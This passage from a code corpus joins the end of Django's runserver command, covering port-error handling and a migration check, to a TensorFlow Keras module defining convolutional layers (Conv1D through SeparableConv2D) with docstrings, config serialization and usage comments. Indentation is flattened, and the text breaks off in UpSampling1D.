run(self.addr, int(self.port), handler,
ipv6=self.use_ipv6, threading=threading)
except socket.error as e:
# Use helpful error messages instead of ugly tracebacks.
ERRORS = {
errno.EACCES: "You don't have permission to access that port.",
errno.EADDRINUSE: "That port is already in use.",
errno.EADDRNOTAVAIL: "That IP address can't be assigned to.",
}
try:
error_text = ERRORS[e.errno]
except KeyError:
error_text = force_text(e)
self.stderr.write("Error: %s" % error_text)
# Need to use an OS exit because sys.exit doesn't work in a thread
os._exit(1)
except KeyboardInterrupt:
if shutdown_message:
self.stdout.write(shutdown_message)
sys.exit(0)
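    # A hedged usage sketch: besides ``python manage.py runserver [addrport]``,
    # the command can be driven programmatically; the reloader forks the
    # process, so scripts usually disable it:
    #
    #   from django.core.management import call_command
    #   call_command('runserver', '127.0.0.1:8080', use_reloader=False)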
def check_migrations(self):
"""
Checks to see if the set of migrations on disk matches the
migrations in the database. Prints a warning if they don't match.
"""
try:
executor = MigrationExecutor(connections[DEFAULT_DB_ALIAS])
except ImproperlyConfigured:
# No databases are configured (or the dummy one)
return
except MigrationSchemaMissing:
self.stdout.write(self.style.NOTICE(
"\nNot checking migrations as it is not possible to access/create the django_migrations table."
))
return
plan = executor.migration_plan(executor.loader.graph.leaf_nodes())
if plan:
self.stdout.write(self.style.NOTICE(
"\nYou have unapplied migrations; your app may not work properly until they are applied."
))
self.stdout.write(self.style.NOTICE("Run 'python manage.py migrate' to apply them.\n"))
# Kept for backward compatibility
BaseRunserverCommand = Command
| bsd-3-clause |
jwlawson/tensorflow | tensorflow/python/keras/_impl/keras/layers/convolutional.py | 3 | 73414 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras convolution layers and image transformation layers.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras._impl.keras import activations
from tensorflow.python.keras._impl.keras import backend as K
from tensorflow.python.keras._impl.keras import constraints
from tensorflow.python.keras._impl.keras import initializers
from tensorflow.python.keras._impl.keras import regularizers
from tensorflow.python.keras._impl.keras.engine import InputSpec
from tensorflow.python.keras._impl.keras.engine import Layer
# imports for backwards namespace compatibility
# pylint: disable=unused-import
from tensorflow.python.keras._impl.keras.layers.pooling import AveragePooling1D
from tensorflow.python.keras._impl.keras.layers.pooling import AveragePooling2D
from tensorflow.python.keras._impl.keras.layers.pooling import AveragePooling3D
from tensorflow.python.keras._impl.keras.layers.pooling import MaxPooling1D
from tensorflow.python.keras._impl.keras.layers.pooling import MaxPooling2D
from tensorflow.python.keras._impl.keras.layers.pooling import MaxPooling3D
# pylint: enable=unused-import
from tensorflow.python.keras._impl.keras.utils import conv_utils
from tensorflow.python.layers import convolutional as tf_convolutional_layers
class Conv1D(tf_convolutional_layers.Conv1D, Layer):
"""1D convolution layer (e.g. temporal convolution).
This layer creates a convolution kernel that is convolved
with the layer input over a single spatial (or temporal) dimension
to produce a tensor of outputs.
If `use_bias` is True, a bias vector is created and added to the outputs.
Finally, if `activation` is not `None`,
it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide an `input_shape` argument
(tuple of integers or `None`, e.g.
  `(10, 128)` for sequences of 10 vectors, each 128-dimensional,
  or `(None, 128)` for variable-length sequences of 128-dimensional
  vectors).
Arguments:
filters: Integer, the dimensionality of the output space
      (i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of a single integer,
specifying the length of the 1D convolution window.
strides: An integer or tuple/list of a single integer,
specifying the stride length of the convolution.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: One of `"valid"`, `"causal"` or `"same"` (case-insensitive).
`"causal"` results in causal (dilated) convolutions, e.g. output[t]
does not depend on input[t+1:]. Useful when modeling temporal data
where the model should not violate the temporal order.
See [WaveNet: A Generative Model for Raw Audio, section
2.1](https://arxiv.org/abs/1609.03499).
dilation_rate: an integer or tuple/list of a single integer, specifying
the dilation rate to use for dilated convolution.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any `strides` value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
      the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
3D tensor with shape: `(batch_size, steps, input_dim)`
Output shape:
3D tensor with shape: `(batch_size, new_steps, filters)`
`steps` value might have changed due to padding or strides.
"""
def __init__(self,
filters,
kernel_size,
strides=1,
padding='valid',
dilation_rate=1,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
super(Conv1D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format='channels_last',
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv1D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
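# A hedged usage sketch (standard tf.keras API assumed): 'valid' padding and
# stride 1 shrink 10 steps to 10 - 3 + 1 = 8, and channels become `filters`:
#
#   import tensorflow as tf
#   model = tf.keras.models.Sequential([
#       tf.keras.layers.Conv1D(32, 3, activation='relu',
#                              input_shape=(10, 128)),
#   ])
#   model.output_shape  # (None, 8, 32)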
class Conv2D(tf_convolutional_layers.Conv2D, Layer):
"""2D convolution layer (e.g. spatial convolution over images).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
      (i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
      the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(samples, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(samples, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(samples, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv2D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
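# A hedged usage sketch: with 'same' padding and stride 2, each spatial
# dimension maps to ceil(dim / stride), so 28x28 becomes 14x14:
#
#   import tensorflow as tf
#   model = tf.keras.models.Sequential([
#       tf.keras.layers.Conv2D(64, (3, 3), strides=(2, 2), padding='same',
#                              input_shape=(28, 28, 1)),
#   ])
#   model.output_shape  # (None, 14, 14, 64)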
class Conv3D(tf_convolutional_layers.Conv3D, Layer):
"""3D convolution layer (e.g. spatial convolution over volumes).
This layer creates a convolution kernel that is convolved
with the layer input to produce a tensor of
outputs. If `use_bias` is True,
a bias vector is created and added to the outputs. Finally, if
`activation` is not `None`, it is applied to the outputs as well.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 1)` for 128x128x128 volumes
with a single channel,
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
      (i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along each spatial
dimension.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, spatial_dim1, spatial_dim2, spatial_dim3, channels)`
while `channels_first` corresponds to inputs with shape
`(batch, channels, spatial_dim1, spatial_dim2, spatial_dim3)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
      the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
5D tensor with shape:
`(samples, channels, conv_dim1, conv_dim2, conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, conv_dim1, conv_dim2, conv_dim3, channels)` if
data_format='channels_last'.
Output shape:
5D tensor with shape:
`(samples, filters, new_conv_dim1, new_conv_dim2, new_conv_dim3)` if
data_format='channels_first'
or 5D tensor with shape:
`(samples, new_conv_dim1, new_conv_dim2, new_conv_dim3, filters)` if
data_format='channels_last'.
`new_conv_dim1`, `new_conv_dim2` and `new_conv_dim3` values might have
changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1, 1),
padding='valid',
data_format=None,
dilation_rate=(1, 1, 1),
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv3D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'dilation_rate': self.dilation_rate,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv3D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Conv2DTranspose(tf_convolutional_layers.Conv2DTranspose, Layer):
"""Transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 3)` for 128x128 RGB pictures
in `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 2 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix.
bias_initializer: Initializer for the bias vector.
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
      the output of the layer (its "activation").
kernel_constraint: Constraint function applied to the kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv2DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv2DTranspose, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
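# A hedged usage sketch: the transpose of the Conv2D example above. With
# 'same' padding, stride 2 doubles each spatial dimension, a common
# upsampling step in encoder-decoder architectures:
#
#   import tensorflow as tf
#   model = tf.keras.models.Sequential([
#       tf.keras.layers.Conv2DTranspose(32, (3, 3), strides=(2, 2),
#                                       padding='same',
#                                       input_shape=(14, 14, 64)),
#   ])
#   model.output_shape  # (None, 28, 28, 32)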
class Conv3DTranspose(tf_convolutional_layers.Conv3DTranspose, Layer):
"""Transposed convolution layer (sometimes called Deconvolution).
The need for transposed convolutions generally arises
from the desire to use a transformation going in the opposite direction
of a normal convolution, i.e., from something that has the shape of the
output of some convolution to something that has the shape of its input
while maintaining a connectivity pattern that is compatible with
said convolution.
When using this layer as the first layer in a model,
provide the keyword argument `input_shape`
(tuple of integers, does not include the sample axis),
e.g. `input_shape=(128, 128, 128, 3)` for a 128x128x128 volume with 3 channels
if `data_format="channels_last"`.
Arguments:
filters: Integer, the dimensionality of the output space
(i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 3 integers, specifying the
depth, height and width of the 3D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 3 integers,
specifying the strides of the convolution along the depth, height
and width.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, depth, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, depth, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
dilation_rate: an integer or tuple/list of 3 integers, specifying
the dilation rate to use for dilated convolution.
Can be a single integer to specify the same value for
all spatial dimensions.
Currently, specifying any `dilation_rate` value != 1 is
incompatible with specifying any stride value != 1.
activation: Activation function to use
(see [activations](../activations.md)).
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
kernel_initializer: Initializer for the `kernel` weights matrix
(see [initializers](../initializers.md)).
bias_initializer: Initializer for the bias vector
(see [initializers](../initializers.md)).
kernel_regularizer: Regularizer function applied to
the `kernel` weights matrix
(see [regularizer](../regularizers.md)).
bias_regularizer: Regularizer function applied to the bias vector
(see [regularizer](../regularizers.md)).
activity_regularizer: Regularizer function applied to
the output of the layer (its "activation").
(see [regularizer](../regularizers.md)).
kernel_constraint: Constraint function applied to the kernel matrix
(see [constraints](../constraints.md)).
bias_constraint: Constraint function applied to the bias vector
(see [constraints](../constraints.md)).
Input shape:
5D tensor with shape:
`(batch, channels, depth, rows, cols)` if data_format='channels_first'
or 5D tensor with shape:
`(batch, depth, rows, cols, channels)` if data_format='channels_last'.
Output shape:
5D tensor with shape:
`(batch, filters, new_depth, new_rows, new_cols)` if
data_format='channels_first'
or 5D tensor with shape:
`(batch, new_depth, new_rows, new_cols, filters)` if
data_format='channels_last'.
`depth` and `rows` and `cols` values might have changed due to padding.
References:
- [A guide to convolution arithmetic for deep
learning](https://arxiv.org/abs/1603.07285v1)
- [Deconvolutional
Networks](http://www.matthewzeiler.com/pubs/cvpr2010/cvpr2010.pdf)
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1, 1),
padding='valid',
data_format=None,
activation=None,
use_bias=True,
kernel_initializer='glorot_uniform',
bias_initializer='zeros',
kernel_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
kernel_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(Conv3DTranspose, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
activation=activations.get(activation),
use_bias=use_bias,
kernel_initializer=initializers.get(kernel_initializer),
bias_initializer=initializers.get(bias_initializer),
kernel_regularizer=regularizers.get(kernel_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
kernel_constraint=constraints.get(kernel_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters': self.filters,
'kernel_size': self.kernel_size,
'strides': self.strides,
'padding': self.padding,
'data_format': self.data_format,
'activation': activations.serialize(self.activation),
'use_bias': self.use_bias,
'kernel_initializer': initializers.serialize(self.kernel_initializer),
'bias_initializer': initializers.serialize(self.bias_initializer),
'kernel_regularizer': regularizers.serialize(self.kernel_regularizer),
'bias_regularizer': regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'kernel_constraint': constraints.serialize(self.kernel_constraint),
'bias_constraint': constraints.serialize(self.bias_constraint)
}
base_config = super(Conv3DTranspose, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class SeparableConv2D(tf_convolutional_layers.SeparableConv2D, Layer):
"""Depthwise separable 2D convolution.
Separable convolutions consist in first performing
a depthwise spatial convolution
(which acts on each input channel separately)
followed by a pointwise convolution which mixes together the resulting
output channels. The `depth_multiplier` argument controls how many
output channels are generated per input channel in the depthwise step.
Intuitively, separable convolutions can be understood as
a way to factorize a convolution kernel into two smaller kernels,
or as an extreme version of an Inception block.
Arguments:
filters: Integer, the dimensionality of the output space
      (i.e. the number of output filters in the convolution).
kernel_size: An integer or tuple/list of 2 integers, specifying the
width and height of the 2D convolution window.
Can be a single integer to specify the same value for
all spatial dimensions.
strides: An integer or tuple/list of 2 integers,
specifying the strides of the convolution along the width and height.
Can be a single integer to specify the same value for
all spatial dimensions.
Specifying any stride value != 1 is incompatible with specifying
any `dilation_rate` value != 1.
padding: one of `"valid"` or `"same"` (case-insensitive).
data_format: A string,
one of `channels_last` (default) or `channels_first`.
The ordering of the dimensions in the inputs.
`channels_last` corresponds to inputs with shape
`(batch, height, width, channels)` while `channels_first`
corresponds to inputs with shape
`(batch, channels, height, width)`.
It defaults to the `image_data_format` value found in your
Keras config file at `~/.keras/keras.json`.
If you never set it, then it will be "channels_last".
    dilation_rate: an integer or tuple/list of 2 integers, specifying
      the dilation rate to use for dilated convolution.
      Can be a single integer to specify the same value for
      all spatial dimensions.
    depth_multiplier: The number of depthwise convolution output channels
for each input channel.
The total number of depthwise convolution output
      channels will be equal to `filters_in * depth_multiplier`.
activation: Activation function to use.
If you don't specify anything, no activation is applied
(ie. "linear" activation: `a(x) = x`).
use_bias: Boolean, whether the layer uses a bias vector.
depthwise_initializer: Initializer for the depthwise kernel matrix.
pointwise_initializer: Initializer for the pointwise kernel matrix.
bias_initializer: Initializer for the bias vector.
depthwise_regularizer: Regularizer function applied to
the depthwise kernel matrix.
pointwise_regularizer: Regularizer function applied to
the pointwise kernel matrix.
bias_regularizer: Regularizer function applied to the bias vector.
activity_regularizer: Regularizer function applied to
      the output of the layer (its "activation").
depthwise_constraint: Constraint function applied to
the depthwise kernel matrix.
pointwise_constraint: Constraint function applied to
the pointwise kernel matrix.
bias_constraint: Constraint function applied to the bias vector.
Input shape:
4D tensor with shape:
`(batch, channels, rows, cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, rows, cols, channels)` if data_format='channels_last'.
Output shape:
4D tensor with shape:
`(batch, filters, new_rows, new_cols)` if data_format='channels_first'
or 4D tensor with shape:
`(batch, new_rows, new_cols, filters)` if data_format='channels_last'.
`rows` and `cols` values might have changed due to padding.
"""
def __init__(self,
filters,
kernel_size,
strides=(1, 1),
padding='valid',
data_format=None,
dilation_rate=1,
depth_multiplier=1,
activation=None,
use_bias=True,
depthwise_initializer='glorot_uniform',
pointwise_initializer='glorot_uniform',
bias_initializer='zeros',
depthwise_regularizer=None,
pointwise_regularizer=None,
bias_regularizer=None,
activity_regularizer=None,
depthwise_constraint=None,
pointwise_constraint=None,
bias_constraint=None,
**kwargs):
if data_format is None:
data_format = K.image_data_format()
super(SeparableConv2D, self).__init__(
filters=filters,
kernel_size=kernel_size,
strides=strides,
padding=padding,
data_format=data_format,
dilation_rate=dilation_rate,
activation=activations.get(activation),
use_bias=use_bias,
depthwise_initializer=initializers.get(depthwise_initializer),
pointwise_initializer=initializers.get(pointwise_initializer),
bias_initializer=initializers.get(bias_initializer),
depthwise_regularizer=regularizers.get(depthwise_regularizer),
pointwise_regularizer=regularizers.get(pointwise_regularizer),
bias_regularizer=regularizers.get(bias_regularizer),
activity_regularizer=regularizers.get(activity_regularizer),
depthwise_constraint=constraints.get(depthwise_constraint),
pointwise_constraint=constraints.get(pointwise_constraint),
bias_constraint=constraints.get(bias_constraint),
**kwargs)
def get_config(self):
config = {
'filters':
self.filters,
'kernel_size':
self.kernel_size,
'strides':
self.strides,
'padding':
self.padding,
'data_format':
self.data_format,
'dilation_rate':
self.dilation_rate,
'activation':
activations.serialize(self.activation),
'use_bias':
self.use_bias,
'depthwise_initializer':
initializers.serialize(self.depthwise_initializer),
'pointwise_initializer':
initializers.serialize(self.pointwise_initializer),
'bias_initializer':
initializers.serialize(self.bias_initializer),
'depthwise_regularizer':
regularizers.serialize(self.depthwise_regularizer),
'pointwise_regularizer':
regularizers.serialize(self.pointwise_regularizer),
'bias_regularizer':
regularizers.serialize(self.bias_regularizer),
'activity_regularizer':
regularizers.serialize(self.activity_regularizer),
'depthwise_constraint':
constraints.serialize(self.depthwise_constraint),
'pointwise_constraint':
constraints.serialize(self.pointwise_constraint),
'bias_constraint':
constraints.serialize(self.bias_constraint)
}
base_config = super(SeparableConv2D, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
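# A hedged sketch of the parameter saving that motivates the factorization:
# a full 3x3 convolution from 64 to 128 channels trains 3*3*64*128 = 73728
# weights, while the depthwise + pointwise pair trains 3*3*64 + 64*128 =
# 8768 (biases omitted):
#
#   import tensorflow as tf
#   sep = tf.keras.layers.SeparableConv2D(128, (3, 3), padding='same',
#                                         input_shape=(32, 32, 64))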
class UpSampling1D(Layer):
"""Upsampling layer for 1D inputs.
Repeats each temporal step `size` times along the time axis.
Arguments:
size: integer. Upsampling factor.
Input shape:
3D tensor with shape: `(batch, steps, features)`.
